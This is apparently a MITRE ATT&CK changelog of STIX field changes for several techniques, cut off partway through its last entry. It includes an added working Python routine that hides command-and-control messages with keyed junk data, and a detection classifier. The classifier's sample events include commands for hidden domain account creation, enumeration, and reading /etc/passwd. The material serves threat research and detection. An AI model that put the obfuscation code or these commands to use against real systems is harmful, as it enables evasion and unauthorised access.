external_references: {'source_name': 'Sygnia Elephant Beetle Jan 2022', 'description': 'Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.', 'url': 'https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d'}

[T1001] Data Obfuscation

Current version: 1.1


Old Description
Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

New Description
Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Details
dictionary_item_added (STIX field: new value)
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed (STIX field: old value -> new value)
modified: 2020-03-15 00:40:27.670000+00:00 -> 2024-02-02 19:04:35.389000+00:00
description: old and new text as given under Old Description / New Description above
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Bitdefender FunnyDream Campaign November 2020', 'description': 'Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.', 'url': 'https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf'}

[T1562.008] Impair Defenses: Disable or Modify Cloud Logs

Current version: 2.0

Details
values_changed (STIX field: old value -> new value)
modified: 2023-10-15 10:47:17.305000+00:00 -> 2024-04-12 21:13:56.431000+00:00

[T1562.001] Impair Defenses: Disable or Modify Tools

Current version: 1.5

Details
values_changed
STIX Field | Old value | New value
modified | 2023-05-28 16:57:27.185000+00:00 | 2024-04-12 21:13:46.640000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0

[T1136.002] Create Account: Domain Account

Current version: 1.1


Old Description:
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

New Description:
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.(Citation: Savill 1999) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-16 17:36:37.600000+00:00 | 2024-02-01 04:37:36.774000+00:00
description | Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. | Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.(Citation: Savill 1999) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'Savill 1999', 'description': 'Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.', 'url': 'https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference'}

[T1087.002] Account Discovery: Domain Account

Current version: 1.2


Old Description:
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.

New Description:
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-15 16:37:59.115000+00:00 | 2024-04-15 21:33:57.732000+00:00
description | Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups. | Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'CrowdStrike StellarParticle January 2022', 'description': 'CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.', 'url': 'https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/'}

[T1615] Group Policy Discovery

Current version: 1.1


Old Description:
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

New Description:
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

Details
values_changed
STIX Field | Old value | New value
description | Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit. | Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

[T1574] Hijack Execution Flow

Current version: 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-05 04:07:01.191000+00:00 | 2023-11-21 20:02:33.404000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0

[T1553.004] Subvert Trust Controls: Install Root Certificate

Current version: 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-09-15 17:26:02.203000+00:00 | 2024-01-04 20:01:27.662000+00:00
external_references[5]['description'] | Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016. | botconf eu. (2014, December 31). David Sancho - Finding Holes in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.
external_references[5]['url'] | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf | https://www.youtube.com/watch?v=gchKFumYHWc
x_mitre_attack_spec_version | 3.1.0 | 3.2.0

[T1001.001] Data Obfuscation: Junk Data

Current version: 1.0


Old Description:
Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

New Description:
Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.2.0
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-15 00:30:25.444000+00:00 | 2024-02-02 20:10:01.862000+00:00
description | Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. | Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'FireEye SUNBURST Backdoor December 2020', 'description': 'FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html'}
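The "junk characters between significant characters" variant described above, in runnable form. This is an added example, not code from the cited SUNBURST report, from ATT&CK, or from this changelog: both ends derive the same junk schedule from a shared key, the sender interleaves base64-alphabet noise before each character of a base64-encoded message, and the receiver replays the schedule to strip it before decoding. The key, the message, and the 0-to-3-characters-per-position schedule are assumptions chosen for the illustration; `naive_decode` stands in for an analyst who has the traffic but not the key.

```python
"""Junk data between significant characters (T1001.001), as an added example.

Not code from the SUNBURST report or from ATT&CK. Sender and receiver share a
key; a deterministic schedule derived from it says how many junk characters
(0..MAX_JUNK, an assumption for this illustration) precede each real character
of a base64-encoded message. Junk is drawn from the base64 alphabet so the
wire blob still looks like base64 to a casual observer.
"""
from __future__ import annotations

import base64
import binascii
import hashlib
import random
import string

ALPHABET = string.ascii_letters + string.digits + "+/"
MAX_JUNK = 3

# Constructed example inputs, not values from any real implant.
EXAMPLE_KEY = b"example-shared-schedule-key"
EXAMPLE_MSG = b'{"cmd":"whoami","id":17}'


def _schedule(key: bytes) -> random.Random:
    """Same key -> same sequence of draws on both ends. random.Random is used
    only as a reproducible schedule here, never as a secret generator."""
    return random.Random(int.from_bytes(hashlib.sha256(key).digest(), "big"))


def obfuscate(payload: bytes, key: bytes) -> str:
    """Base64-encode payload, then put 0..MAX_JUNK junk chars before each char."""
    rng = _schedule(key)
    out = []
    for ch in base64.b64encode(payload).decode("ascii"):
        out.append("".join(rng.choice(ALPHABET)
                           for _ in range(rng.randint(0, MAX_JUNK))))
        out.append(ch)
    return "".join(out)


def deobfuscate(blob: str, key: bytes) -> bytes | None:
    """Replay the schedule, skip the junk, decode what is left. Returns None if
    the blob does not fit the schedule (wrong key or corrupted data)."""
    rng = _schedule(key)
    significant = []
    i = 0
    try:
        while i < len(blob):
            n = rng.randint(0, MAX_JUNK)
            for _ in range(n):          # consume the same draws the sender made
                rng.choice(ALPHABET)
            i += n
            significant.append(blob[i])
            i += 1
        return base64.b64decode("".join(significant), validate=True)
    except (IndexError, binascii.Error, ValueError):
        return None


def naive_decode(blob: str) -> bytes | None:
    """What an analyst without the key gets: drop non-alphabet characters, fix
    the padding, decode. It usually 'works' and yields garbage, which is the
    point of the technique."""
    cleaned = "".join(c for c in blob if c in ALPHABET)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None


if __name__ == "__main__":
    blob = obfuscate(EXAMPLE_MSG, EXAMPLE_KEY)
    print("wire:    ", blob)
    print("receiver:", deobfuscate(blob, EXAMPLE_KEY))
    print("naive:   ", naive_decode(blob))
```

The lesson for detection is that "does it base64-decode?" is not a useful test: the padded blob decodes, just not to anything meaningful. Cheap tells remain (a `=` that is not at the end of the token, a token length that is not a multiple of four, a byte distribution that does not look like real base64 output), and because the receiver must reproduce the schedule, the key material has to be present in the implant, where it can be recovered and used to strip captured traffic.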

[T1087.001] Account Discovery: Local Account

Current version: 1.4


Old Description:
Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

New Description:
Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-13 17:20:22.867000+00:00 | 2024-01-11 23:47:44.655000+00:00
description | Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts. | Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'id man page', 'description': 'MacKenzie, D. and Robbins, A. (n.d.). id(1) - Linux man page. Retrieved January 11, 2024.', 'url': 'https://linux.die.net/man/1/id'}
external_references |  | {'source_name': 'groups man page', 'description': 'MacKenzie, D. and Youngman, J. (n.d.). groups(1) - Linux man page. Retrieved January 11, 2024.', 'url': 'https://linux.die.net/man/1/groups'}
external_references |  | {'source_name': 'Mandiant APT1', 'description': 'Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf'}
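Four of the entries above (T1136.002 Create Account: Domain Account, T1087.002 Account Discovery: Domain Account, T1615 Group Policy Discovery, and T1087.001 Account Discovery: Local Account) name concrete commands. As an added example that is not part of this changelog or of the ATT&CK data, here is a small command-line classifier that maps process-creation events to those technique IDs. The event schema (host, user, cmdline) and every sample event are constructed; treating `net1.exe` (the helper that `net.exe` launches) as equivalent to `net.exe`, and the way `/add` is used to separate account creation from enumeration, are assumptions about how these commands show up in endpoint telemetry, not anything the page states.

```python
"""Command-line analytics for the account and Group Policy techniques above.

Added example, not code from ATT&CK or from this changelog. The event schema
(host, user, cmdline) and all sample events are constructed; the net1.exe
handling is an assumption about how net.exe commands appear in telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str
    name: str
    pattern: re.Pattern[str]


# net.exe, net1.exe, or a full path to either, followed by the sub-command.
NET = r"\bnet1?(?:\.exe)?\s+"

RULES = (
    # Creation first: "net user X Y /add /domain" also contains "/domain", so
    # the enumeration rules must exclude /add (and /del) or account creation
    # would be mislabelled as discovery.
    Rule("T1136.002", "Create Account: Domain Account",
         re.compile(NET + r"user\b(?=.*\s/add\b)(?=.*\s/domain\b)", re.I)),
    Rule("T1087.002", "Account Discovery: Domain Account",
         re.compile(NET + r"(?:user|group)\b(?!.*\s/(?:add|del)\b).*\s/domain\b", re.I)),
    Rule("T1087.002", "Account Discovery: Domain Account",
         re.compile(r"\bdscacheutil\s+-q\s+group\b|\bldapsearch\b"
                    r"|\bGet-AD(?:User|GroupMember)\b", re.I)),
    Rule("T1087.001", "Account Discovery: Local Account",
         re.compile(NET + r"(?:user\b(?!.*\s/(?:add|del|domain)\b)"
                    r"|localgroup\b(?!.*\s/(?:add|del)\b))", re.I)),
    Rule("T1087.001", "Account Discovery: Local Account",
         # id/groups only as a command word (line start or after ; & |), never
         # as a substring such as "uuid" or a shell variable such as "id=".
         re.compile(r"(?:^|[;&|]\s*)(?:/usr/bin/)?(?:id|groups)\b(?!\s*=)"
                    r"|/etc/passwd\b|\bdscl\s+\.\s+list\s+/Users\b")),
    Rule("T1615", "Group Policy Discovery",
         re.compile(r"\bgpresult(?:\.exe)?\b|\bGet-DomainGPO(?:LocalGroup)?\b", re.I)),
)


def classify(cmdline: str) -> set[str]:
    """Technique IDs whose rule matches this command line (empty set if none)."""
    return {rule.technique for rule in RULES if rule.pattern.search(cmdline)}


def scan(events: list[dict]) -> list[dict]:
    """One finding per (event, technique); events without a match are dropped."""
    findings = []
    for ev in events:
        for tid in sorted(classify(ev["cmdline"])):
            findings.append({"host": ev["host"], "user": ev["user"],
                             "technique": tid, "cmdline": ev["cmdline"]})
    return findings


# Constructed process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "cmdline": "net user /domain"},
    {"host": "ws01", "user": "CORP\\jdoe", "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "ws01", "user": "CORP\\jdoe", "cmdline": "net user svc_backup Passw0rd! /add /domain"},
    {"host": "ws02", "user": "CORP\\asmith",
     "cmdline": "C:\\Windows\\System32\\net1.exe localgroup administrators"},
    {"host": "ws02", "user": "CORP\\asmith", "cmdline": "gpresult /r /scope computer"},
    {"host": "ws02", "user": "CORP\\asmith",
     "cmdline": "powershell -nop -c \"Get-ADGroupMember -Identity 'Domain Admins'\""},
    {"host": "lx01", "user": "www-data", "cmdline": "cat /etc/passwd | grep -v nologin"},
    {"host": "lx01", "user": "www-data", "cmdline": "whoami; id; groups"},
    {"host": "mac01", "user": "kim", "cmdline": "dscl . list /Users"},
    {"host": "ws03", "user": "CORP\\it-admin", "cmdline": "netstat -ano"},  # benign, must not fire
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['user']:16} {f['technique']:10} {f['cmdline']}")
```

The edge case worth noting is the third sample event: a rule written as "`net user` ... `/domain`" would tag the account creation as domain account discovery, because the creation command line contains `/domain` too, which is why the enumeration rules carry negative lookaheads for `/add` and `/del`. Command-line matching of this kind is also trivially evaded (renamed or copied binaries, obfuscated PowerShell, direct LDAP or SAMR calls instead of net.exe), so for account creation in particular it should sit beside event-based sources such as Windows Security event 4720 ("A user account was created") rather than replace them.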

[T1134.003] Access Token Manipulation: Make and Impersonate Token

Current version: 1.1


Old Description:
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.

New Description:
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-11 21:22:17.257000+00:00 | 2024-01-10 17:55:46.905000+00:00
description | Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one. | Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'LogonUserW function', 'description': 'Microsoft. (2023, March 10). LogonUserW function (winbase.h). Retrieved January 8, 2024.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw'}

[T1059.006] Command and Scripting Interpreter: Python

Current version: 1.0


Old Description:
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

New Description:
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020) Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.2.0
x_mitre_deprecated |  | False
x_mitre_remote_support |  | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] | 
values_changed
STIX Field | Old value | New value
modified | 2021-07-26 22:49:23.094000+00:00 | 2024-01-30 18:35:58.021000+00:00
description | Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors. | Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020) Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'Zscaler APT31 Covid-19 October 2020', 'description': 'Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.', 'url': 'https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online'}

[T1584.004] Compromise Infrastructure: Server

Current version: 1.2


Old Description:
Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.

New Description:
Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-13 00:00:25.676000+00:00 | 2024-01-31 20:05:44.075000+00:00
description | Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. | Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
iterable_item_added
STIX Field | Old value | New value
